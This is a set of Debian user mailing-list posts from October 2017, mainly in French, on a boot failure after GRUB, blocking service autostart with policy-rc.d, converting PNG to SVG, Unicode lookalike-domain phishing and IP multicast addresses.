J'ai booté un live debian xfce pour monter ma partition affectée ds un
chroot pour voir les erreurs de la commande :dmesg
J'ai attaché à ce mail le screenshot d'une erreur qui me semble être
liée au problème... car cette erreur, je ne l'avais jamais vue
auparavant
Autre fait intéressant et toujours dans ma live session... thunar, qui
liste par défaut les périphériques, ne liste pas cette partition
(dev/sda6), la partition debian à problème...Par contre il liste toutes
les autres:temp,data,etc

J'ai l'impression que lors du dernier redémarrage de celle-ci, elle
n'aurait pas fermé comme à l'habitude (vu le message cité plus
haut : Gave up waiting for suspend/resume device)
Aussi c'est que, la dernière chose que j'ai fait avant de redémarrer
c'est de créer une clé usb bootable avec "cp
firmware-9.0.0-amd64-netinst.iso /dev/sdc && sync" (je n'ai pas
précisé le chemin du iso, car j'étais dans le répertoire...)
et ensuite, lors de mon démarrage en mode live session dans le chroot
le périphérique créé par cp était dans mon /media/pascal/debian 9.0.0
amd64 n.Je sais pas si il y a corrélation et je préférais vous le
dire . Pourtant mon système s'est fermé comme à l'habitude.

Pensez-vous que le screenshot en PJ a à voir avec ce problème?
Sinon, auriez-vous une piste à me suggérer?

Merci

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[Nikolas Pattakos]

On Tue, Oct 3, 2017, at 07:26 AM, Ioannis Proios wrote:
> Καλημέρα.
> 
> Ναι δεν είναι bug αλλά σίγουρα είναι δουλειά της εφαρμογής.
> Όπως δηλαδή και με το login του browser, αν η τράπεζα δεν απαιτούσε SSL
> θα
> λέγαμε ότι φταίει ο browser που δεν το κάνει από μόνος.

Δεν ασχολούμαι ιδιαίτερα με android ούτε έχω εθνική αλλά αφού επιμένεις:

1)  αν νομίζεις ότι έχεις βρει κάποιο κενό ασφαλείας, μπορείς να μου
(μας) πεις ποιο είναι αυτό που χρησιμοποιεί και τι θα έπρεπε να
χρησιμοποιεί για να μην θεωρείς ότι έχει κενό ασφαλείας.

2) ακόμα καλύτερα μπορείς να το χακάρεις; αν όχι ένα proof of concept
έστω ένα draft?

> Επειδή λοιπόν μιλάμε για την υπ.αριθμόν 1(?) τράπεζα της Ελλάδος θεωρώ
> τραγικό λάθος να παραβλέψει το θέμα ασφαλείας.
> Ένας λόγος παραπάνω έπρεπε να δώσει μεγαλύτερη προσοχή επειδή είχε να
> κάνει
> με ένα open source OS και όχι να το αφήσει κατά το "δοκούν".

Πρώτον δεν είναι όλα στο android open source. ξέρεις ποιον κώδικα
χρησιμοποιεί αυτό που ισχυρίζεσαι ότι δεν είναι ασφαλές και αν είναι
open source ή proprietary?
Δεύτερον, η σύνδεση που κάνεις στο επειχείρημά σου μεταξύ open source
και μεγαλύτερης προσοχής είναι νομίζω μεταξύ ασαφής, συζητήσιμης ίσως
και αβάσιμης.

Φιλικά,
Νίκος

-- 

Nikolas Pattakos < nsp >

A: Because it messes up the order in which people normally read text.
Q: Why is it such a bad thing?
A: Top-posting.
Q: What is the most annoying thing on usenet and in e-mail?

Re: Re: Re: Prevent apt/dpkg from automatically enabling services during the upgrade process.

[cabezachumbo]

Thank you very much sir. I appreciate that information.

> Hi.
> 
> On Tue, Oct 03, 2017 at 01:53:45PM +0200, cabezachu...@gmail.com wrote:
> > Hello!
> > I guess that the script prevents from enabling currently disabled
> > services.
> 
> Why guess if it's all there? And no, that's not the script intention.
> 
> What it does is implements the policy "Prevent apt/dpkg from
> automatically starting services during the upgrade process if said
> services are disabled by systemctl disable".
> 
> Implementing other policies are left as an exercise for readers of
> invoke-rc.d(8).
> 
> > One more thing, what should I do if I also want that after installing a
> > new
> > service with "apt install service" it doesn't get enabled automatically in
> > the installation process?
> 
> Changing a distribution would be a simple huge step in the right
> direction. Starting a daemon during a package installing is considered a
> vital part of Debian Policy for the last 15 years at least.
> 
> Reco

Rien ne se passe après Grub2...

[louis]

Bonjour à tous et à toutes!

Le problème est sur une debian Stretch 9.1 stable, xfce4.
Précisément, après le menu grub, j'appuie sur enter pour choisir cette
debian et rien ne se passe...un clignotement, puis un message
disant :Gave up waiting for suspend/resume device

Et avec le mode sans échec, je me heurte
à :Begin /scripts/local-block.Done
Et sa répète cette ligne à l'infini..

J'ai booté un live debian xfce pour monter ma partition affectée ds un
chroot pour voir les erreurs de la commande :dmesg
J'ai attaché à ce mail le screenshot d'une erreur qui me semble être
liée au problème... car cette erreur, je ne l'avais jamais vue
auparavant
Autre fait intéressant et toujours dans ma live session... thunar, qui
liste par défaut les périphériques, ne liste pas cette partition
(dev/sda6), la partition debian à problème...Par contre il liste toutes
les autres:temp,data,etc

J'ai l'impression que lors du dernier redémarrage de celle-ci, elle
n'aurait pas fermé comme à l'habitude (vu le message cité plus
haut : Gave up waiting for suspend/resume device)
Aussi c'est que, la dernière chose que j'ai fait avant de redémarrer
c'est de créer une clé usb bootable avec "cp
firmware-9.0.0-amd64-netinst.iso /dev/sdc && sync" (je n'ai pas
précisé le chemin du iso, car j'étais dans le répertoire...)
et ensuite, lors de mon démarrage en mode live session dans le chroot
le périphérique créé par cp était dans mon /media/pascal/debian 9.0.0
amd64 n.Je sais pas si il y a corrélation et je préférais vous le
dire . Pourtant mon système s'est fermé comme à l'habitude.

Pensez-vous que le screenshot en PJ a à voir avec ce problème?
Sinon, auriez-vous une piste à me suggérer?

Merci

Re: [HS] Transformer image pixels en mode vectoriel

[bernard . schoenacker]

- Mail original -
> De: "andre debian" 
> À: debian-user-french@lists.debian.org
> Envoyé: Mardi 3 Octobre 2017 13:17:42
> Objet: [HS] Transformer image pixels en mode vectoriel
> 
> Bonjour,
> 
> Désolé pour cette demande pas 100% Debian.
> 
> Comment transformer une image (logo) PNG pixels,
> au format vectoriel (SVG) ?
> Ceci permet d'agrandir l'image sans perte de qualité.
> 
> J'ai cherché via Google, mais sans résultat probant...
> Alors, est-ce possible ?
> 
> Merci d'avance,
> 
> André
> 
> 
bonjour,

et voici le paquet :

https://www.npmjs.com/package/png2svg

slt
bernard

Re: [HS] Transformer image pixels en mode vectoriel

[bernard . schoenacker]

- Mail original -
> De: "andre debian" 
> À: debian-user-french@lists.debian.org
> Envoyé: Mardi 3 Octobre 2017 13:17:42
> Objet: [HS] Transformer image pixels en mode vectoriel
> 
> Bonjour,
> 
> Désolé pour cette demande pas 100% Debian.
> 
> Comment transformer une image (logo) PNG pixels,
> au format vectoriel (SVG) ?
> Ceci permet d'agrandir l'image sans perte de qualité.
> 
> J'ai cherché via Google, mais sans résultat probant...
> Alors, est-ce possible ?
> 
> Merci d'avance,
> 
> André
> 
> 

bonjour,

il faut mettre en place potrace :

https://stackoverflow.com/questions/1861382/how-to-convert-a-png-image-to-a-svg

slt
bernard

Re: mail et reply (was: phishing en UTF8)

[David - DCPC]

Bonjour,

Pour Vincent.

Merci pour l'alerte, mais je comprends pas trop d'où ça provient étant
donné que je viens de refaire des tests et relire plusieurs anciens emails
échangés sur différentes sources avec différents clients, et je ne vois pas
ce problème, tout est bien visible avec 2 ou + niveaux. J'avoue ne jamais
trop avoir regardé s'il y a des détails spécifiques sur les mails dans ces
listes de diffusion, sauf à devoir à chaque fois inverser les destinataires
qd je fait un reply all avec gmail ; et jamais eu de remarque de ce genre
sinon.

Quand au "conseil" sur gmail, je le prendrais tel quel, mais me permettrai
de l'ignorer, ayant qd même le choix pour gérer mes emails, surtout qu'il
fonctionne très bien depuis de nombreuses années avec des centaines de
contacts tant personnels que professionnels. Et que je ne semble pas être
le seul à en être très satisfait.

Quand à l'affichage, en fait je viens de voir sur les archives officielles
de la liste que mon message semble apparaître normalement :
https://lists.debian.org/debian-user-french/2017/10/msg00019.html

Avez-vous bien configuré votre client mail ou bien testé un autre client
mail ? ( :o) )

David


Le 3 octobre 2017 à 13:18, Vincent Lefevre  a écrit :

> On 2017-10-03 09:24:51 +, Eric Degenetais wrote:
> > Le 3 oct. 2017 11:16 AM, "David - DCPC"  a écrit :
> >
> > Ha merci beaucoup pour l'explication.
> > Par contre du coup pour détecter ça, c'est plus compliqué ..
> >
> > Effectivement ! D'où l'idée de la frappe manuelle ou du favori : comme on
> > n'utilise pas l'adresse du mail, on n'a pas besoin de détecter le piège
> > pour l'éviter.
>
> Il faudrait apprendre à citer correctement, et éviter gmail par la
> même occasion. Ci-dessus le texte cité et la réponse apparaissent
> au même niveau.
>
> --
> Vincent Lefèvre  - Web: 
> 100% accessible validated (X)HTML - Blog: 
> Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
>
>


-- 
Salutations,
David CHALON

Re: [HS] Transformer image pixels en mode vectoriel

[Julien]

Bonjour,

Dans inkscape il y a un outil pour vectoriser un bitmap.
J'ai pas mon ordi sous la main mais j'ai déjà fait ça.
Par contre, le nombre de couleur est limité et l'image simplifiée (angles 
arrondis, etc.).

Julien

3 octobre 2017 14:04 "Danilo Uccelli"  a écrit:
 Bonjour,
A mon avis, il n'y a pas de solution automatique. 
Si je devais faire ça, j'utiliserais inkscape et je redessinerais à la main, 
forme par forme, en plaçant l'image originale comme couche de fond. 
Mais peut-être que quelqu'un connais une meilleure façon de procéder. 
Bon après-midi. 
Danilo  
Le 3 octobre 2017 à 13:17,  a écrit :

 Bonjour,

Désolé pour cette demande pas 100% Debian.

Comment transformer une image (logo) PNG pixels,
au format vectoriel (SVG) ?
Ceci permet d'agrandir l'image sans perte de qualité.

J'ai cherché via Google, mais sans résultat probant...
Alors, est-ce possible ?

Merci d'avance,

André

Re: phishing en UTF8

[Dominique Asselineau]

Vincent Lefevre wrote on Tue, Oct 03, 2017 at 02:26:25PM +0200
> On 2017-10-03 13:44:31 +0200, Yann Serre wrote:
> > Non, ANSI
> > https://fr.wikipedia.org/wiki/American_National_Standards_Institute
> > 
> > "Le jeu de caractères Windows-1252 est appelé par erreur « ANSI »"
> 
> Donc pas ANSI. Windows-1252 à la rigueur. Mais autant se restreindre
> à l'ASCII. Et même là, il y a des confusions entre l, I et 1, surtout
> avec certaines fontes.

Oui, en effet.  De toute façon, les fausses URL n'ont pas attendu
l'Unicode pour apparaître.  Des noms de société quelque peu compliqués
ont été détournés. Et dans ce cas, ni la frappe manuelle ni une
conversion ASCII ne permettent d'éviter le piège.

Dominique

> 
> -- 
> Vincent Lefèvre  - Web: 
> 100% accessible validated (X)HTML - Blog: 
> Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
> 

-- 

Re: phishing en UTF8

[andre_debian]

On Tuesday 03 October 2017 13:06:48 Vincent Lefevre wrote:
> On 2017-10-02 11:35:13 +0200, Haricophile wrote:
> > J'ai reçu pour la première fois un spam de phishing avec un caractère
> > en UTF8 pour induire en erreur. Je me demandais quand ça allait
> > arriver, il va falloir redoubler de pédagogie et de prudence.

> Pour ma part, j'ai désactivé l'IDN partout où je le pouvais.

Les Hackers créent des caractères très proches des langues,
afin de substituer un site et réaliser un "pishing",
Donc prudence de mise...

Re: SOLVED - Re: xfce4-terminal fails to “pass through” environment variables

[tomas]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, Oct 03, 2017 at 08:31:59AM -0400, Greg Wooledge wrote:
> On Tue, Oct 03, 2017 at 08:35:43AM +0200, to...@tuxteam.de wrote:
> > This, dear reader assumes you are reading in monospace (Zenaan, I
> > know you do, but think of those poor souls bound to a Web interface ;-)
> 
> They are already in hell.  Nothing I can do to save them.
> 
> > > ← ↑ ↓ → ⋱ ⋰ ⇄ ※
> >   * *   *
> > 
> > > ⨡ ⨠ ⨟ ⋿ ⦂ ⊙ ⦀ ∣ ⇉ ↦ ⨾
> >   * * * * *   *   *
> > 
> > > ⟩ ⟨ ❵ ❴ ¦ ‖ ¡ ‼ µ ♮ ♯
> > 
> > 
> > > π ∞ ‡ ♥ ∑ ⁽ ⁾ ₎ ₍ ∙
> > 
> > 
> > > … † ° ¤ № ¶ — ≡ ± ⫶ ∴
> > *
> > 
> > (that makes roughly 20% failure rate on your sample, whatever
> > that means).
> 
> My results in screen-inside-urxvt match yours with one exception: the
> last character on the first line appears as a symmetric pattern of lines
> and dots for me.

Ah, yes. That's what Emacs shows too. It's "REFERENCE MARK", kind of
an X with four dots within the spaces between the arms

> Before this thread, I didn't know Debian's xterm had come so far.
> That's surely a good thing.

Tell *me*. Things I'm infinitely thankful for.

Cheers
- -- tomás
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlnThaAACgkQBcgs9XrR2kZG4QCfRhBMyntXfoL5RSrHpeAEemu9
SRoAn2Zmjv9Cpjj6PZ/wduSGS0D70Q7v
=VuUi
-END PGP SIGNATURE-

Re: phishing en UTF8

[Yann Serre]

Eh oui, abus de langage.
Notepad++ l'utilise pourtant dans ses menus.

Remarque : convertir un fichier de "UTF-8 vers ASCII" n'est pas quelque 
chose dont je comprends le sens :) Mais je sens que poursuivre la 
conversation va découper les cheveux en 52 (en notation ASCII décimale) !


Le 03/10/2017 à 14:26, Vincent Lefevre a écrit :

Donc pas ANSI. Windows-1252 à la rigueur.

Re: phishing en UTF8

[Vincent Lefevre]

On 2017-10-03 14:12:07 +0200, Dominique Asselineau wrote:
> Quand on clique, c'est déjà trop tard puisque l'un des objectifs est
> de vérifier si l'adresse électronique est bonne et si on clique, on
> accuse bonne réception.

Peut-être. Mais j'ai fini par avoir de gros doutes sur ça. Les
spammeurs continuent à envoyer leur spam, même en cas de rejet.
Bref, ils ne vérifient rien.

Le principal risque, c'est si la page tente d'exploiter des
vulnérabilités des navigateurs web.

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Re: SOLVED - Re: xfce4-terminal fails to “pass through” environment variables

[Greg Wooledge]

On Tue, Oct 03, 2017 at 08:35:43AM +0200, to...@tuxteam.de wrote:
> This, dear reader assumes you are reading in monospace (Zenaan, I
> know you do, but think of those poor souls bound to a Web interface ;-)

They are already in hell.  Nothing I can do to save them.

> > ← ↑ ↓ → ⋱ ⋰ ⇄ ※
>   * *   *
> 
> > ⨡ ⨠ ⨟ ⋿ ⦂ ⊙ ⦀ ∣ ⇉ ↦ ⨾
>   * * * * *   *   *
> 
> > ⟩ ⟨ ❵ ❴ ¦ ‖ ¡ ‼ µ ♮ ♯
> 
> 
> > π ∞ ‡ ♥ ∑ ⁽ ⁾ ₎ ₍ ∙
> 
> 
> > … † ° ¤ № ¶ — ≡ ± ⫶ ∴
> *
> 
> (that makes roughly 20% failure rate on your sample, whatever
> that means).

My results in screen-inside-urxvt match yours with one exception: the
last character on the first line appears as a symmetric pattern of lines
and dots for me.

Before this thread, I didn't know Debian's xterm had come so far.
That's surely a good thing.

Re: phishing en UTF8

[Vincent Lefevre]

On 2017-10-03 13:44:31 +0200, Yann Serre wrote:
> Non, ANSI
> https://fr.wikipedia.org/wiki/American_National_Standards_Institute
> 
> "Le jeu de caractères Windows-1252 est appelé par erreur « ANSI »"

Donc pas ANSI. Windows-1252 à la rigueur. Mais autant se restreindre
à l'ASCII. Et même là, il y a des confusions entre l, I et 1, surtout
avec certaines fontes.

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Re: [HS] Transformer image pixels en mode vectoriel

[Vincent Lefevre]

On 2017-10-03 14:03:11 +0200, Danilo Uccelli wrote:
> A mon avis, il n'y a pas de solution automatique.

Si, ça s'appelle la vectorisation, mais évidemment ça marche plus ou
moins bien suivant l'image bitmap.

> Si je devais faire ça, j'utiliserais inkscape et je redessinerais à la
> main, forme par forme, en plaçant l'image originale comme couche de fond.

Inkscape est capable de le faire automatiquement. Cf par exemple:

  http://goinkscape.com/how-to-vectorize-in-inkscape/

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Re: Re: Prevent apt/dpkg from automatically enabling services during the upgrade process.

[cabezachumbo]

Hello! 
I guess that the script prevents from enabling currently disabled services.
One more thing, what should I do if I also want that after installing a new 
service with "apt install service" it doesn't get enabled automatically in the 
installation process?

Thank you very much Reco.
Regards.

> It's a hack, but it should work. Create an executable file called
> /usr/sbin/policy-rc.d with the following contents:
> 
> #!/bin/sh
> /bin/systemctl --quiet is-enabled $1 && exit 0
> echo All rc operations are disabled by policy: $1 $2
> exit 101
> 
> Reco

Re: phishing en UTF8

[Dominique Asselineau]

Vincent Lefevre wrote on Tue, Oct 03, 2017 at 01:12:50PM +0200
> On 2017-10-02 17:33:21 +, Eric Degenetais wrote:
> > Bonjour, un caractère UTF-8 à quel niveau ? Une URL ?
> > J'aurais du mal à faire confiance à un mail non sollicité qui me demande de
> > cliquer sur un lien.
> 
> Certains mails non sollicités peuvent apparaître comme des mails
> légitimes. C'est un peu le but du phishing.
> 
> > Est-il encore valable de conseiller de toujours entrer L'URL de connexion à
> > la main ?
> 
> Certaines URL sont parfois trop longues pour être entrées à la main.
> Mais si on suit ainsi un lien, ne pas soumettre d'informations
> personnelles, tout du moins sans faire de grosses vérifications.

Quand on clique, c'est déjà trop tard puisque l'un des objectifs est
de vérifier si l'adresse électronique est bonne et si on clique, on
accuse bonne réception.

Dominique

> 
> -- 
> Vincent Lefèvre  - Web: 
> 100% accessible validated (X)HTML - Blog: 
> Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)
> 

-- 

Re: Re: Prevent apt/dpkg from automatically enabling services during the upgrade process.

[Reco]

Hi.

On Tue, Oct 03, 2017 at 01:53:45PM +0200, cabezachu...@gmail.com wrote:
> Hello! 
> I guess that the script prevents from enabling currently disabled services.

Why guess if it's all there? And no, that's not the script intention.

What it does is implements the policy "Prevent apt/dpkg from
automatically starting services during the upgrade process if said
services are disabled by systemctl disable".

Implementing other policies are left as an exercise for readers of
invoke-rc.d(8).


> One more thing, what should I do if I also want that after installing a new 
> service with "apt install service" it doesn't get enabled automatically in 
> the 
> installation process?

Changing a distribution would be a simple huge step in the right
direction. Starting a daemon during a package installing is considered a
vital part of Debian Policy for the last 15 years at least.

Reco

Re: [HS] Transformer image pixels en mode vectoriel

[Danilo Uccelli]

Bonjour,

A mon avis, il n'y a pas de solution automatique.
Si je devais faire ça, j'utiliserais inkscape et je redessinerais à la
main, forme par forme, en plaçant l'image originale comme couche de fond.

Mais peut-être que quelqu'un connais une meilleure façon de procéder.

Bon après-midi.
Danilo

Le 3 octobre 2017 à 13:17,  a écrit :

> Bonjour,
>
> Désolé pour cette demande pas 100% Debian.
>
> Comment transformer une image (logo) PNG pixels,
> au format vectoriel (SVG) ?
> Ceci permet d'agrandir l'image sans perte de qualité.
>
> J'ai cherché via Google, mais sans résultat probant...
> Alors, est-ce possible ?
>
> Merci d'avance,
>
> André
>
>

Re: phishing en UTF8

[Yann Serre]

Non, ANSI
https://fr.wikipedia.org/wiki/American_National_Standards_Institute

"Le jeu de caractères Windows-1252 est appelé par erreur « ANSI »"


Le 03/10/2017 à 13:24, Vincent Lefevre a écrit :

Dans ce cas copier le long lien dans le mail, le coller dans un fichier
texte seul en UTF-8, convertir en ANSI et les éventuels caractères non

  ASCII?

Re: phishing en UTF8

[Eric Degenetais]

Le 3 oct. 2017 1:19 PM, "Yann Serre"  a écrit :

Dans ce cas copier le long lien dans le mail, le coller dans un fichier
texte seul en UTF-8, convertir en ANSI et les éventuels caractères non
conformes sont démasqués ?

Pourquoi pas. Malheureusement certaines personnes seront bloquées devant
cette procédure par phobie de la technique.
Personnellement je suis peu convaincu par le rapport risque / bénéfice des
URL Unicode pour les langues occidentales. C'est une autre histoire pour
les langues utilisant un autre système d'écriture, évidemment. Je pense que
pour sécuriser les URL, on aurait dû réfléchir à l'exclusion de plages de
caractères permettant ces ambiguïtés visuelles. Un peu tard, maintenant, je
suppose.


Le 03/10/2017 à 13:12, Vincent Lefevre a écrit :

> Certaines URL sont parfois trop longues pour être entrées à la main.
>

Oui, mais ces URL correspondent généralement à des e-mail de validation ou
de réinitialisation. Dans ce cas le destinataire a un critère de validation
simple : quand on reçoit ce type de mail on sait si on l'a demandé ou non.
Si on n'a rien demandé, poubelle.

Cordialement

Éric Dégenètais

Re: phishing en UTF8

[Vincent Lefevre]

On 2017-10-03 13:19:07 +0200, Yann Serre wrote:
> Dans ce cas copier le long lien dans le mail, le coller dans un fichier
> texte seul en UTF-8, convertir en ANSI et les éventuels caractères non
 ASCII?
> conformes sont démasqués ?

En gros, ça revient plus simplement à désactiver l'IDN dans son
navigateur. Avec Firefox, mettre network.IDN_show_punycode à true.

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Re: phishing en UTF8

[Yann Serre]

Dans ce cas copier le long lien dans le mail, le coller dans un fichier 
texte seul en UTF-8, convertir en ANSI et les éventuels caractères non 
conformes sont démasqués ?


Le 03/10/2017 à 13:12, Vincent Lefevre a écrit :

Certaines URL sont parfois trop longues pour être entrées à la main.

mail et reply (was: phishing en UTF8)

[Vincent Lefevre]

On 2017-10-03 09:24:51 +, Eric Degenetais wrote:
> Le 3 oct. 2017 11:16 AM, "David - DCPC"  a écrit :
> 
> Ha merci beaucoup pour l'explication.
> Par contre du coup pour détecter ça, c'est plus compliqué ..
> 
> Effectivement ! D'où l'idée de la frappe manuelle ou du favori : comme on
> n'utilise pas l'adresse du mail, on n'a pas besoin de détecter le piège
> pour l'éviter.

Il faudrait apprendre à citer correctement, et éviter gmail par la
même occasion. Ci-dessus le texte cité et la réponse apparaissent
au même niveau.

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

[HS] Transformer image pixels en mode vectoriel

[andre_debian]

Bonjour,

Désolé pour cette demande pas 100% Debian.

Comment transformer une image (logo) PNG pixels,
au format vectoriel (SVG) ?
Ceci permet d'agrandir l'image sans perte de qualité.

J'ai cherché via Google, mais sans résultat probant...
Alors, est-ce possible ?

Merci d'avance,

André

Re: phishing en UTF8

[Vincent Lefevre]

On 2017-10-02 11:35:13 +0200, Haricophile wrote:
> J'ai reçu pour la première fois un spam de phishing avec un caractère
> en UTF8 pour induire en erreur. Je me demandais quand ça allait
> arriver, il va falloir redoubler de pédagogie et de prudence.

Pour ma part, j'ai désactivé l'IDN partout où je le pouvais.

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Re: phishing en UTF8

[Vincent Lefevre]

On 2017-10-02 17:33:21 +, Eric Degenetais wrote:
> Bonjour, un caractère UTF-8 à quel niveau ? Une URL ?
> J'aurais du mal à faire confiance à un mail non sollicité qui me demande de
> cliquer sur un lien.

Certains mails non sollicités peuvent apparaître comme des mails
légitimes. C'est un peu le but du phishing.

> Est-il encore valable de conseiller de toujours entrer L'URL de connexion à
> la main ?

Certaines URL sont parfois trop longues pour être entrées à la main.
Mais si on suit ainsi un lien, ne pas soumettre d'informations
personnelles, tout du moins sans faire de grosses vérifications.

-- 
Vincent Lefèvre  - Web: 
100% accessible validated (X)HTML - Blog: 
Work: CR INRIA - computer arithmetic / AriC project (LIP, ENS-Lyon)

Re: Re : phishing en UTF8

[Eric Degenetais]

Le 3 oct. 2017 11:16 AM, "David - DCPC"  a écrit :

Ha merci beaucoup pour l'explication.
Par contre du coup pour détecter ça, c'est plus compliqué ..

Effectivement ! D'où l'idée de la frappe manuelle ou du favori : comme on
n'utilise pas l'adresse du mail, on n'a pas besoin de détecter le piège
pour l'éviter.

Re: This (new to me) ip thingy

[tomas]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, Oct 03, 2017 at 11:07:04AM +0200, to...@tuxteam.de wrote:

[...]

Addendum: elsewhere in this thread, Avahi was mentioned. You'll find
this guy[1] in the same Wikipedia ref under "link local" addresses
(169.254.0.0/16). Those are "fairly normal" IP addresses, just that
the so-configured hosts will just grab them without you, the admin,
having given them permission to do so.

Cheers

[1] This is an oversimplification. Link local addresses are part of
zeroconf, and avahi is (part of) zeroconf's implementation. So they
are rather cousins, like Scylla [2] and Charybdis [3]

[2] https://en.wikipedia.org/wiki/Scylla
[3] https://en.wikipedia.org/wiki/Charybdis

- -- tomás
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlnTVgQACgkQBcgs9XrR2kYUVACfYTgAq0uLX9C8MofB+qZlIRE8
LbYAn0j52IhlU6eoe8yEeDq9MMaTReRV
=d9tb
-END PGP SIGNATURE-

Re: Re : phishing en UTF8

[David - DCPC]

Ha merci beaucoup pour l'explication.
Par contre du coup pour détecter ça, c'est plus compliqué ...

Le 3 octobre 2017 à 10:57, Eric Degenetais  a écrit :

> Le 2 oct. 2017 9:42 PM, "Yann Serre"  a
> écrit :
>
> Bonjour,
>
> Prenons l'exemple d'un site authentique avec le domaine axa.com
> Le pêcheur réserve un nom de domaine avec le x qui n'est pas un X mais un
> caractère qui ressemble à un x en utf-8.
> Le poisson voit axa.com, il ne se méfie pas... pourtant il est orienté
> vers le site du pêcheur.
>
> Yann
>
> Donc il s'agit bien d'URL piégées. Du coup je suppose que le conseil de ne
> pas utiliser les liens trouvés dans un e-mail, mais entrer manuellement
> l'URL de base des sites pour se connecter, ou à la rigueur un favori, est
> toujours d'actualité, n'est-ce pas ?
>
> Cordialement
>
>


-- 
Salutations,
David CHALON

Re: This (new to me) ip thingy

[tomas]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Tue, Oct 03, 2017 at 04:36:12AM -0400, Gene Heskett wrote:
> On Tuesday 03 October 2017 04:17:49 Reco wrote:

[...]

> > Multicasts are not anything that *anyone* should configure.
> > The whole idea of them is that your L2 network segment configures by
> > itself.
> >
> > Reco
> 
> In that class A? Not even my isp has anything there.  Its not a pingable 
> address from here as I believe dd-wrt would stop it, nor does whois have 
> a clue. NSA back door?  Damnifiknow. Traceroute gets zero response too.  
> So what or who is it?

Reco's right. Have a look at [1], heck, spend an afternoon at your local
lib thumbing through R.L.Stevens "TCP/IP Illustrated". This afternoon
will pay for itself in terms of time within the next half-year, believe
me.

The address range 224.0.0.0/4 (in binary: 1110   ,
if my skills haven't betrayed me) is reserved for "IP multicast". One
source, many receivers. Think radio or TV broadcast. The sender sends
a packet once, and each router where traffic might split "knows" behind
which branch there are "interested" receivers (there's a protocol to
"register" interest). This router is then responsible for duplicating
packets. The idea is to not send the same packet 1 times over the
same link.

Needless to say that even the idea of pinging such an address is
somewhat... mind bending :-)

Cheers
[1] https://en.wikipedia.org/wiki/IPV4#Special-use_addresses

- -- tomás
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlnTUzgACgkQBcgs9XrR2kac+gCdG+I3OEAFV7O74idsLO3RpurK
LqEAn3vjcsh+RYUBUPCga0z7sNR9gR/g
=Ckbk
-END PGP SIGNATURE-

Re: This (new to me) ip thingy

[Reco]

Hi.

On Tue, Oct 03, 2017 at 04:36:12AM -0400, Gene Heskett wrote:

> > > >Frankly I'm not surprised that it failed to resolve 224.0.0.251.
> > > > Nobody sane would add a DNS record for this anyway.
> > >
> > > I think thats from avahi, is definitely is not anything I have
> > > configured.
> >
> > Multicasts are not anything that *anyone* should configure.
> > The whole idea of them is that your L2 network segment configures by
> > itself.
>
> In that class A?

Classful networks are obsolete. See RFC 4632.

> Not even my isp has anything there.

Mutlicasts are limited to a *local* network segment. Unless a black
magic called IGMP proxy is involved.

> Its not a pingable address from here as I believe dd-wrt would stop it, nor 
> does whois have a clue.

Of course it's not pingable.
The whole point of 224.0.0.0/4 network is that there is no host that has
such addresses assigned, yet UDP packets should come to any host in a
*local* (in L2 sense) network segment. Assuming that said host wants to
listen such multicast address.

Also, RFC 1112.

> NSA back door?  Damnifiknow.

Nope. There's no point in such backdoor as multicasts are not routable.

> Traceroute gets zero response too.  

It should. Multicasts don't use ICMP.

Reco

Re: Re : phishing en UTF8

[Eric Degenetais]

Le 2 oct. 2017 9:42 PM, "Yann Serre"  a écrit :

Bonjour,

Prenons l'exemple d'un site authentique avec le domaine axa.com
Le pêcheur réserve un nom de domaine avec le x qui n'est pas un X mais un
caractère qui ressemble à un x en utf-8.
Le poisson voit axa.com, il ne se méfie pas... pourtant il est orienté vers
le site du pêcheur.

Yann

Donc il s'agit bien d'URL piégées. Du coup je suppose que le conseil de ne
pas utiliser les liens trouvés dans un e-mail, mais entrer manuellement
l'URL de base des sites pour se connecter, ou à la rigueur un favori, est
toujours d'actualité, n'est-ce pas ?

Cordialement

Re: This (new to me) ip thingy

[Gene Heskett]

On Tuesday 03 October 2017 04:17:49 Reco wrote:

>   Hi.
>
> On Tue, Oct 03, 2017 at 04:04:56AM -0400, Gene Heskett wrote:
> > On Tuesday 03 October 2017 03:02:42 Reco wrote:
> > > ip -r n s
> >
> > returns this unsorted list:
> > rock64Sheldon.coyote.den dev eth0 lladdr 3e:1b:98:17:e3:8c STALE
> > scanner.coyote.den dev eth0 lladdr 30:05:5c:8a:2d:c8 STALE
> > picnc.coyote.den dev eth0 lladdr b8:27:eb:d3:47:2d STALE
> > lathe.coyote.den dev eth0 lladdr 38:60:77:cd:f3:2f STALE
> > router.coyote.den dev eth0 lladdr 4c:e6:76:ad:34:0a STALE
> > GO704.coyote.den dev eth0 lladdr 00:1a:a0:a7:a8:d4 STALE
> > shop.coyote.den dev eth0 lladdr 38:60:77:4e:38:1b STALE
> >
> > No clue why it should mark them all as stale except they've been up
> > since the last power failure. This room is the only UPS and not all
> > of it is on the UPS.  I also have a 20kw nat-gas standby in the
> > backyard, so failures are just short enough to screw up the
> > auto-reboot settings.
>
> STALE has nothing to do with it. A typical ARP record (MAC-IP
